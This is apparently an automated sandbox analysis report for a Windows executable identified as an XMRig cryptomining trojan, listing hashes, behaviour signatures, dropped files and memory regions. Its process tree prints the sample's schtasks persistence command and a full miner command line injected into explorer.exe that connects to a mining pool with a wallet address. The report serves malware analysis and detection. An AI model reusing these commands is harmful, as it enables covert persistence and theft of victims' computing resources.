Overview

overview

10

Static

static

3

ad0aca1934...a3.exe

windows7-x64

10

ad0aca1934...a3.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-02-2024 22:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ad0aca1934f02768fd5fedaf4d9762a3.exe

  • Size

    43KB

  • MD5

    ad0aca1934f02768fd5fedaf4d9762a3

  • SHA1

    0e5b8372015d81200c4eff22823e854d0030f305

  • SHA256

    dc10f50f9761f6fbafe665e75a331b2048a285b1857ad95e0611ace825cba388

  • SHA512

    2fba342010ba85440784190245f74ea9e7c70974df12c241ccb6b72a6e1006a72bd1fa2e657f434d7479758f9508edb315398f6e95d167a78b788cea732be3b7

  • SSDEEP

    768:0LsiW8XQn6hvJhLP2vt83id406wh6R71o/dx/m5Td/OFVexrg7iRjekdmIglUf:0Ls5ot3LC864Pwhk7Kdlmdd/OForljes

Score
10/10
xmrigminer

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 13 IoCs
    miner
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 54 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\ad0aca1934f02768fd5fedaf4d9762a3.exe
    "C:\Users\Admin\AppData\Local\Temp\ad0aca1934f02768fd5fedaf4d9762a3.exe"
    1⤵
    • Checks computer location settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2400
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1092
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        3⤵
        • Creates scheduled task(s)
        PID:3408
    • C:\Users\Admin\AppData\Roaming\services64.exe
      "C:\Users\Admin\AppData\Roaming\services64.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3304
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4824
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
          4⤵
          • Creates scheduled task(s)
          PID:3976
      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        3⤵
        • Executes dropped EXE
        PID:2556
      • C:\Windows\explorer.exe
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.main/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BJ+edII5Fll530cZ/+msGEWovb73nU3RrOnuNmRoFcg" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4612

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    Filesize

    7KB

    MD5

    be0b4b1c809dc419f44b990378cbae31

    SHA1

    5c40c342e0375d8ca7e4cc4e1b81b7ef20a22806

    SHA256

    530bd3b9ec17f111b0658fddeb4585cd6bf6edb1561bdebd1622527c36a63f53

    SHA512

    5ce316cfe5e25b0a54ceb157dee8f85e2c7825d91a0cd5fae0500b68b85dd265903582728d4259428d2e44b561423dac1499edcf0606ac0f78e8485ce3c0af24

    Download Submit

  • C:\Users\Admin\AppData\Roaming\services64.exe
    Filesize

    43KB

    MD5

    ad0aca1934f02768fd5fedaf4d9762a3

    SHA1

    0e5b8372015d81200c4eff22823e854d0030f305

    SHA256

    dc10f50f9761f6fbafe665e75a331b2048a285b1857ad95e0611ace825cba388

    SHA512

    2fba342010ba85440784190245f74ea9e7c70974df12c241ccb6b72a6e1006a72bd1fa2e657f434d7479758f9508edb315398f6e95d167a78b788cea732be3b7

    Download Submit

  • memory/2400-18-0x00007FFB5FAC0000-0x00007FFB60581000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2400-1-0x00007FFB5FAC0000-0x00007FFB60581000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2400-4-0x00000000010B0000-0x00000000010BE000-memory.dmp

    Filesize

    56KB

    Download

  • memory/2400-5-0x0000000001280000-0x0000000001292000-memory.dmp

    Filesize

    72KB

    Download

  • memory/2400-2-0x00007FFB5FAC0000-0x00007FFB60581000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2400-0-0x0000000000800000-0x0000000000810000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2400-3-0x000000001CB20000-0x000000001CB30000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2556-36-0x0000000000620000-0x0000000000626000-memory.dmp

    Filesize

    24KB

    Download

  • memory/2556-37-0x00007FFB5FAC0000-0x00007FFB60581000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2556-38-0x000000001C3B0000-0x000000001C3C0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2556-56-0x000000001C3B0000-0x000000001C3C0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2556-55-0x00007FFB5FAC0000-0x00007FFB60581000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3304-21-0x0000000003950000-0x0000000003960000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3304-20-0x00007FFB5FAC0000-0x00007FFB60581000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3304-44-0x00007FFB5FAC0000-0x00007FFB60581000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3304-19-0x00007FFB5FAC0000-0x00007FFB60581000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4612-42-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

    Download

  • memory/4612-46-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

    Download

  • memory/4612-45-0x0000000000850000-0x0000000000870000-memory.dmp

    Filesize

    128KB

    Download

  • memory/4612-47-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

    Download

  • memory/4612-48-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

    Download

  • memory/4612-49-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

    Download

  • memory/4612-50-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

    Download

  • memory/4612-51-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

    Download

  • memory/4612-52-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

    Download

  • memory/4612-53-0x0000000002610000-0x0000000002650000-memory.dmp

    Filesize

    256KB

    Download

  • memory/4612-54-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

    Download

  • memory/4612-43-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

    Download

  • memory/4612-40-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

    Download

  • memory/4612-57-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

    Download

  • memory/4612-58-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

    Download

  • memory/4612-59-0x0000000014150000-0x0000000014170000-memory.dmp

    Filesize

    128KB

    Download

  • memory/4612-60-0x0000000014150000-0x0000000014170000-memory.dmp

    Filesize

    128KB

    Download